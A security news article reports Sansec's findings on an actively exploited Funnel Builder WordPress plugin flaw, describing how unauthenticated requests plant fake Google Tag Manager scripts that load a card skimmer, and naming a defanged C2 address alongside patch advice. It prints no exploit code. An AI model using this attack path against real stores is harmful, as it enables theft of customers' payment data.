Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores

Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages.

A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.

Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores. 

Attackers injected an e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply security updates immediately and review checkout pages for signs of compromise.

“Attackers are planting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.” reads the report published by Sansec.

The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious <script> tag, attackers can skim payment data from every checkout transaction.

“An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin’s global settings.” continues the report. “Whatever sits in the “External Scripts” setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.”

The patch adds proper permission checks and limits access to approved methods only.

Sansec observed attackers abusing the Funnel Builder flaw to inject malware disguised as a Google Tag Manager or Analytics script. The fake loader silently downloads a second-stage script from an attacker-controlled domain and opens a WebSocket connection to a remote C2 server (“wss://protect-wss[.]com/ws”). Then, a custom payment skimmer is delivered to steal credit card numbers, CVVs, billing addresses, and other customer data during checkout.

Attackers mimic trusted tracking tags to avoid detection.

FunnelKit urged customers to immediately update Funnel Builder to version 3.15.0.3 after discovering a flaw that allowed attackers to inject malicious scripts into checkout pages. Users are also advised to review the plugin’s External Scripts settings and remove any unknown code. Security experts further recommend scanning affected stores to detect skimmers, malware, backdoors, or other signs of compromise.

Sansec also provided indicators of compromise (IoCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)